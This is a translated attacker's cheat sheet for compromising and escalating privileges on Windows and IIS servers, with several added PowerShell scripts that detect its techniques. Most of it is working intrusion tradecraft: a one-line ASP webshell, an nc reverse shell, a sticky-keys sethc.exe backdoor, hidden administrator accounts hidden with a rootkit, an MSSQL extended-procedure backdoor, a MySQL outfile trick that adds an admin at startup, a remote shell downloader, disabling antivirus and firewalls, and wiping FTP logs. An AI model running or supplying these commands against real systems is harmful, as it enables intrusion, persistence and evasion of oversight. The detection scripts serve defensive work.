Windows penetration and Elevation of Privilege: skills Summary

Source: Internet
Author: User
Tags: password protection, mstsc, nod32, antivirus

Finding the website path:
 
1. Read website configuration.
 
2. Use the following VBS (run it with cscript; it prints each IIS site's host header and root path):

On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
    MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
    WScript.Quit
End If
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
    If IsNumeric(obj3w.Name) Then
        Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
        Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
        If Err <> 0 Then WScript.Quit (1)
        WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
        For Each Binds In OService.ServerBindings
            Web = "{ " & Replace(Binds, ":", " } { ") & " }"
            WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
        Next
        WScript.Echo "Path            : " & VDirObj.Path
    End If
Next

 
3. List the sites with iis_spy (note: the ASPX and IISSPY methods require ASPX support and use downgraded copies of activeds.dll and activeds.tlb).
 
4. Obtain the target site's directory. You can write a webshell into it with echo ^<%execute(request("cmd"))%^> >> X:\target directory\X.asp, or copy a script file to X:\target directory\X.asp; you can also try the type command.
 
Possible website directory (note: usually on virtual-host setups):
Data/htdocs.website/
 
Notes on managing the VPN (RAS) from cmd:

# Allow administrator to dial in to the VPN:
netsh ras set user administrator permit

# Forbid administrator from dialing in to the VPN:
netsh ras set user administrator deny

# View which users may dial in to the VPN:
netsh ras show user

# View how VPN client IP addresses are assigned:
netsh ras ip show config

# Assign IP addresses from a static address pool:
netsh ras ip set addrassign method=pool

# Address pool from 192.168.3.1 to 192.168.3.254:
netsh ras ip add range from=192.168.3.1 to=192.168.3.254
 
Add an SQL Server user from the cmd/DOS command line:

You must have administrator rights. Create the file c:\test.qry with the following content:

exec master.dbo.sp_addlogin test, 123
exec sp_addsrvrolemember 'test', 'sysadmin'

Then run in DOS: cmd.exe /c isql -E /U alma /P /i c:\test.qry
 
Alternative way to add a user:

Besides deleting net.exe and not using ADSI, here is another way to add a user. The code is as follows:

JS:

var o = new ActiveXObject("Shell.Users");
var z = o.create("test");
z.changePassword("123456", "");
z.setting("AccountType") = 3;

VBS:

Set o = CreateObject("Shell.Users")
Set z = o.create("test")
z.changePassword "123456", ""
z.setting("AccountType") = 3

Access control (cacls) from cmd:

The commands are as follows:

cacls c:\ /e /t /g everyone:F   # grant Everyone full control on drive C

cacls "directory" /d everyone   # deny Everyone, so nobody, administrators included, can read it

Note:

In the folder's Security settings, set Everyone to deny read. If there is no Security tab, open Tools > Folder Options and uncheck "Use simple file sharing".
 
3389 (RDP) related; the following work better together with pr:

A. Firewall / TCP/IP filtering (disable with: net stop yyagent & net stop sharedaccess)

B. Intranet environment (use lcx.exe port forwarding)

C. "The terminal server has exceeded the maximum allowed connections" (XP: run mstsc /admin; 2003: run mstsc /console)
 
1. Query the terminal port:

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

2. Enable Terminal Services on XP and 2003:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal port to 2008 (hexadecimal 0x7d8):

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0x7d8 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x7d8 /f

4. Remove the XP and 2003 firewall restriction on Terminal Services / IP connections:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:@xpsp2res.dll,-22009" /f
 
 
create table a (cmd text);
insert into a values ("set wshshell=createobject(""wscript.shell"")");
insert into a values ("a=wshshell.run(""cmd.exe /c net user admin /add"",0)");
insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\Documents and Settings\All Users\Start Menu\Program\Start\.vbs";

 
The webshell's PortMap function forwards ports much like lcx. When ASPX is supported, this forwarding is used to keep the foothold hidden. (Note: the function sits in an out-of-the-way corner and is always overlooked.)
 
Disable common antivirus software (remove all permissions on the files in the antivirus installation directory):

Handling an abnormal Norton Enterprise Edition:
 
 
McAfee EE:
net stop "McAfee McShield"

Symantec virus logs:

C:\Documents and Settings\All Users\Application Data\Symantec Endpoint Protection\Logs

Symantec quarantine (virus backups):

C:\Documents and Settings\All Users\Application Data\Symantec Endpoint Protection\Quarantine

NOD32 quarantine (virus backups):

C:\DOCUME~1\Administrator\Local Settings\Application Data\ESET NOD32 Antivirus\Quarantine

NOD32, remove password protection:

Delete "HKEY_LOCAL_MACHINE\SOFTWARE\ESET Security\CurrentVersion\Info\PackageID".
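The "remove all permissions" trick above, like the cacls /d everyone command earlier, leaves a recognisable fingerprint in the ACLs of the antivirus directories. The following PowerShell is an added example and not code from the original page: it reads the ACL on each antivirus path the page lists and reports Deny entries, a missing Allow for SYSTEM, and a replaced (non-inherited) ACL. The ProgramData and Program Files locations for newer Windows releases are assumptions, not from the page.

```powershell
# Added example, not from the original page: check antivirus and quarantine
# directories for the "strip all permissions" tampering described above.
# Read-only. Run from an elevated PowerShell (3.0 or later).

$avPaths = @(
    # Paths the page lists (XP/2003 layout)
    'C:\Documents and Settings\All Users\Application Data\Symantec Endpoint Protection',
    'C:\Documents and Settings\Administrator\Local Settings\Application Data\ESET NOD32 Antivirus',
    # Assumed equivalents on Vista and later (not from the page; adjust to your install)
    (Join-Path $env:ProgramData 'Symantec\Symantec Endpoint Protection'),
    (Join-Path $env:ProgramFiles 'ESET\ESET NOD32 Antivirus'),
    (Join-Path $env:ProgramFiles 'McAfee')
)

function Test-AvDirectoryAcl {
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path)) { return }
    $acl = Get-Acl -LiteralPath $Path
    $findings = @()

    # A Deny entry is exactly what "cacls <dir> /d everyone" produces
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Deny') {
            $findings += "Deny for $($ace.IdentityReference.Value) ($($ace.FileSystemRights))"
        }
    }

    # The AV service runs as SYSTEM; without an Allow entry it cannot read its own files
    $systemAllow = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and $_.IdentityReference.Value -eq 'NT AUTHORITY\SYSTEM'
    }
    if (-not $systemAllow) { $findings += 'no Allow entry for SYSTEM' }

    # A fully replaced ACL (inheritance cut) is worth a second look
    if ($acl.AreAccessRulesProtected) { $findings += 'inheritance disabled' }

    $summary = if ($findings) { $findings -join '; ' } else { 'ok' }
    [pscustomobject]@{
        Path     = $Path
        Owner    = $acl.Owner
        Findings = $summary
    }
}

$avPaths | ForEach-Object { Test-AvDirectoryAcl -Path $_ } | Format-List
```

Some products legitimately cut inheritance and set explicit ACLs on their own directories, so compare the report against a known-good host of the same product version rather than treating "inheritance disabled" alone as a finding; a Deny for Everyone or a missing SYSTEM Allow, by contrast, is never part of a normal install.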
 
Install the sticky-keys (five Shift presses) backdoor and replace sethc.exe:

Sticky-keys backdoor (five Shift presses):

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
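After the copies above, sethc.exe is byte-for-byte cmd.exe, so it can be spotted by hash, by Authenticode status and by the OriginalFilename in its version resource. The following PowerShell is an added example, not code from the page: it checks sethc.exe and its dllcache copy, and (an addition beyond the page) utilman.exe and osk.exe, which are the same class of pre-logon accessibility binary.

```powershell
# Added example, not from the original page: detect the sethc.exe swap shown above.
# Read-only. Needs PowerShell 4.0 or later for Get-FileHash; run elevated.

$sys32   = Join-Path $env:SystemRoot 'System32'
$cmdHash = (Get-FileHash -LiteralPath (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash

# sethc.exe is the file the page swaps; dllcache is the XP/2003 copy it also overwrites.
# utilman.exe and osk.exe are added here as the other pre-logon accessibility binaries.
$candidates = @(
    (Join-Path $sys32 'sethc.exe'),
    (Join-Path $sys32 'dllcache\sethc.exe'),
    (Join-Path $sys32 'utilman.exe'),
    (Join-Path $sys32 'osk.exe')
)

function Test-AccessibilityBinary {
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path)) { return }
    $flags = @()

    # 1. Same content as cmd.exe
    $hash = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    if ($hash -eq $cmdHash) { $flags += 'identical to cmd.exe' }

    # 2. Signature state (catalog-signed system files report Valid on Windows 8 and later)
    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($sig.Status -ne 'Valid') { $flags += "signature $($sig.Status)" }

    # 3. cmd.exe's version resource names itself "Cmd.Exe"; a real sethc.exe says "sethc.exe"
    $origName = (Get-Item -LiteralPath $Path).VersionInfo.OriginalFilename
    $leaf     = Split-Path -Path $Path -Leaf
    if ($origName -and ($origName -ne $leaf)) { $flags += "OriginalFilename is '$origName'" }

    $verdict = if ($flags) { 'SUSPECT: ' + ($flags -join '; ') } else { 'ok' }
    [pscustomobject]@{
        Path    = $Path
        SHA256  = $hash
        Verdict = $verdict
    }
}

$candidates | ForEach-Object { Test-AccessibilityBinary -Path $_ } | Format-List
```

On the XP and 2003 hosts the page targets there is no Get-FileHash; the same comparison is fc /b %systemroot%\system32\sethc.exe %systemroot%\system32\cmd.exe, which prints "no differences encountered" when the swap has been made. On Windows 7 catalog-signed system files can show NotSigned, so there the hash and OriginalFilename checks are the reliable ones.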

 
 
Add a hidden system account:

1. Run: net user admin$ 123456 /add & net localgroup administrators admin$ /add

2. Export the user's two key values from under the registry's SAM key.

3. Delete admin$ in the user management interface, then import the exported registry backup back.

4. Use Hacker Defender to hide the related user registry keys.
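Two things in the steps above are checkable from the defender's side: the '$' suffix, which net user omits from its listing, and the SAM keys that are imported back after the account is deleted in the console. The following PowerShell is an added example, not from the page; it assumes the Microsoft.PowerShell.LocalAccounts module (Windows 10 / Server 2016 and later) and that the SAM comparison is run as SYSTEM, since HKLM\SAM is unreadable otherwise.

```powershell
# Added example, not from the original page: look for the hidden-account pattern above.
# Run as SYSTEM (for instance psexec -s powershell.exe) to include the SAM comparison;
# without that right, that part is skipped and noted. Read-only.

function Find-SuspiciousLocalAccounts {
    $findings = @()

    # 1. Administrators whose name ends in '$'. 'net user' does not list such
    #    accounts, which is why the page picks that kind of name.
    $admins = Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $_.ObjectClass -eq 'User' }
    foreach ($m in $admins) {
        $short = ($m.Name -split '\\')[-1]          # strip the COMPUTER\ prefix
        if ($short.EndsWith('$')) {
            $findings += "administrator with `$ suffix: $($m.Name)"
        }
    }

    # 2. Names present under the SAM hive but absent from the SAM API view.
    #    Exporting the keys, deleting the user in the console and importing the
    #    keys back leaves an account that normal enumeration may no longer show.
    $samNames = 'HKLM:\SAM\SAM\Domains\Account\Users\Names'
    if (Test-Path -LiteralPath $samNames) {
        $inSam  = (Get-ChildItem -LiteralPath $samNames).PSChildName
        $listed = (Get-LocalUser).Name
        foreach ($n in $inSam) {
            if ($listed -notcontains $n) {
                $findings += "account in SAM hive but not enumerated: $n"
            }
        }
    } else {
        $findings += 'note: HKLM\SAM not readable; rerun as SYSTEM for the SAM comparison'
    }

    return $findings
}

Find-SuspiciousLocalAccounts
```

Step 4 of the page uses a rootkit to hide the keys, and a rootkit hides them from this script as well; once that is suspected, the SAM hive has to be read offline (from a shadow copy or a mounted disk image) and compared with the live listing.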
 
Install an MSSQL extended stored procedure backdoor:

USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT EXEC ON xp_helpsystem TO public;
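An extended procedure registered this way appears in master's sys.extended_procedures with a DLL name the instance did not ship with, and often with an EXECUTE grant to public. The following PowerShell is an added example, not from the page: it queries the instance over System.Data.SqlClient and flags entries that do not match a known-DLL list. The connection string (local default instance, Windows authentication) and the $knownDlls list are assumptions; take the list from a known-good instance of the same version.

```powershell
# Added example, not from the original page: audit the extended stored procedures
# registered in master for the sp_addextendedproc backdoor pattern shown above.
# Assumptions: Windows authentication to a local default instance, and that
# $knownDlls reflects the DLLs this SQL Server version ships in Binn. Read-only.

$server = 'localhost'
# DLLs shipped in SQL Server's Binn directory that host Microsoft's own xp_ procedures
# (assumed list; verify against a clean instance of the same version)
$knownDlls = @('xpstar.dll', 'xpstar90.dll', 'xplog70.dll', 'xpsqlbot.dll', 'xprepl.dll', 'odsole70.dll')

function Get-ExtendedProcAudit {
    param([string]$ServerInstance = $server)

    $conn = New-Object System.Data.SqlClient.SqlConnection(
        "Server=$ServerInstance;Database=master;Integrated Security=True")
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()
        # sys.extended_procedures exists from SQL Server 2005 on; on SQL Server 2000
        # EXEC sp_helpextendedproc gives the same name/DLL pairs. The EXISTS clause
        # reports whether 'public' holds EXECUTE, as granted in the page's example.
        $cmd.CommandText = @"
SELECT p.name, p.dll_name,
       CASE WHEN EXISTS (
            SELECT 1 FROM sys.database_permissions AS perm
            JOIN sys.database_principals AS dp ON dp.principal_id = perm.grantee_principal_id
            WHERE perm.major_id = p.object_id AND perm.type = 'EX'
              AND perm.state = 'G' AND dp.name = 'public')
       THEN 1 ELSE 0 END AS public_exec
FROM sys.extended_procedures AS p
ORDER BY p.name
"@
        $reader = $cmd.ExecuteReader()
        while ($reader.Read()) {
            $dll   = [string]$reader['dll_name']
            $flags = @()
            # A bare file name is loaded from Binn; a full path points somewhere else entirely
            if ($dll -match '[\\:]') { $flags += 'explicit path' }
            if ($knownDlls -notcontains (Split-Path -Path $dll -Leaf)) { $flags += 'unknown DLL' }
            if ([int]$reader['public_exec'] -eq 1) { $flags += 'public can execute' }
            $verdict = if ($flags) { 'REVIEW: ' + ($flags -join '; ') } else { 'ok' }
            [pscustomobject]@{
                Name    = [string]$reader['name']
                Dll     = $dll
                Verdict = $verdict
            }
        }
        $reader.Close()
    } finally {
        $conn.Close()
    }
}

Get-ExtendedProcAudit | Format-Table -AutoSize
```

A few shipped procedures (xp_dirtree, xp_fileexist and the like) are granted to public by default, so "public can execute" on its own is noise; "unknown DLL" or "explicit path" is the line to act on, and the DLL file itself in Binn should then be checked for signature and timestamp.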
 
Handling the server's MSFTP logs:

Under C:\WINNT\system32\LogFiles\MSFTPSVC1\ there are three files: ex011120.log, ex011121.log and ex011124.log. Deleting ex011124.log fails with "the source file is in use".

You can of course delete ex011120.log and ex011121.log directly. Open ex011124.log in Notepad, delete some of the content, save, overwrite, and exit.

Once the "msftpsvc" service is stopped, ex011124.log can be deleted directly.
 
Clear the MSSQL Query Analyzer connection history:

MSSQL 2000 keeps it in the registry at:

HKEY_CURRENT_USER\Software\Microsoft SQL Server\80\Tools\Client\PrefServers

Delete the entries there.

MSSQL 2005 keeps it in:
C:\Documents and Settings\<user>\Application Data\Microsoft SQL Server\90\Tools\Shell\mru.dat
 
When a restrictive system blocks uploads, you can fetch the shell by remote download:

<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
    Dim Ads, Retrieval, GetRemoteData
    On Error Resume Next
    Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "Get", s_RemoteFileUrl, False, "", ""
        .Send
        GetRemoteData = .ResponseBody
    End With
    Set Retrieval = Nothing
    Set Ads = Server.CreateObject("Adodb.Stream")
    With Ads
        .Type = 1
        .Open
        .Write GetRemoteData
        .SaveToFile Server.MapPath(s_LocalFileName), 2
        .Cancel()
        .Close()
    End With
    Set Ads = Nothing
End Sub
eWebEditor_SaveRemoteFile "your shell's name", "your shell's url"
%>

 
Remove TCP/IP filtering:

TCP/IP filtering has three entries in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Export the keys with the following commands:
regedit /e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
regedit /e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit /e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Then, in each of the three files, change:
"EnableSecurityFilters"=dword:00000001

to:
"EnableSecurityFilters"=dword:00000000

Import the three files back into the registry with:
regedit /s D:\a.reg
regedit /s D:\b.reg
regedit /s D:\c.reg
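Every change in the 3389 section (fDenyTSConnections, the two PortNumber values, the hand-written GloballyOpenPorts firewall exception) and in this TCP/IP-filtering section (EnableSecurityFilters in each control set) is a registry value that can be read back and compared with a baseline. The following PowerShell is an added example, not from the page, that does that for both sections; the baseline values (RDP disabled, port 3389, filtering on) are an assumption for a host that should not expose RDP, and on Vista and later the EnableSecurityFilters value is normally absent because TCP/IP filtering was an XP/2003 feature.

```powershell
# Added example, not from the original page: read back the registry values changed by
# the page's 3389 section and TCP/IP-filtering section and report deviations from a
# baseline. The baseline is an assumption; adjust to policy. Read-only; run elevated.

$checks = @(
    @{ Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
       Name = 'fDenyTSConnections'; Expect = 1;    Finding = 'RDP connections enabled' },
    @{ Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
       Name = 'PortNumber';         Expect = 3389; Finding = 'RDP listener port changed' },
    @{ Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp'
       Name = 'PortNumber';         Expect = 3389; Finding = 'RDP transport port changed' }
)

# EnableSecurityFilters lives in every ControlSetNNN; the page sets it to 0 in each one.
$controlSets = Get-ChildItem -LiteralPath 'HKLM:\SYSTEM' | Where-Object { $_.PSChildName -like 'ControlSet0*' }
foreach ($cs in $controlSets) {
    $checks += @{ Key     = "HKLM:\SYSTEM\$($cs.PSChildName)\Services\Tcpip"
                  Name    = 'EnableSecurityFilters'; Expect = 1
                  Finding = 'TCP/IP filtering disabled' }
}

function Get-RegistryBaselineReport {
    foreach ($c in $checks) {
        $item  = Get-ItemProperty -LiteralPath $c.Key -Name $c.Name -ErrorAction SilentlyContinue
        $value = if ($item) { $item.($c.Name) } else { $null }
        $verdict = if ($null -eq $value)       { 'value absent' }
                   elseif ($value -ne $c.Expect) { $c.Finding }
                   else                          { 'ok' }
        [pscustomobject]@{ Key = $c.Key; Value = $c.Name; Actual = $value; Expected = $c.Expect; Verdict = $verdict }
    }

    # Firewall exceptions written directly into the legacy XP/2003 policy key (step 4 of the 3389 section)
    $fwList = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List'
    if (Test-Path -LiteralPath $fwList) {
        $key = Get-Item -LiteralPath $fwList
        foreach ($name in $key.GetValueNames()) {
            [pscustomobject]@{ Key = $fwList; Value = $name; Actual = $key.GetValue($name); Expected = '(none)'; Verdict = 'manual firewall exception' }
        }
    }
}

Get-RegistryBaselineReport | Format-Table -AutoSize -Wrap
```

A PortNumber of 2008 (0x7d8) shows up as "RDP listener port changed" in both keys, and a 3389:TCP entry in the List key is reported as an exception that no GUI or netsh command wrote. Run the same report from a scheduled task and diff its output over time; the values only change on purpose, so any diff is an event worth a ticket.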
 
Tips for webshell privilege escalation:

Cmd path:
C:\windows\temp\cmd.exe

nc is in the same directory. A reverse shell entered as one line, such as:

"C:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

generally does not succeed.

Instead, enter this directly as the cmd path:

C:\windows\temp\nc.exe

and this as the command:
-vv ip 999 -e c:\windows\temp\cmd.exe

That does succeed. But this is not the focus:

we usually need the method above to run pr.exe or Churchill successfully.

Run the following command to pack a RAR archive:

rar a -k -r -s -m3 c:\1.rar c:\folde
 
After reading the Windows version, do not miss the Linux version. Portal: Linux penetration and Elevation of Privilege: skills Summary
 
[Via @ 0x/t00ls/lcx]
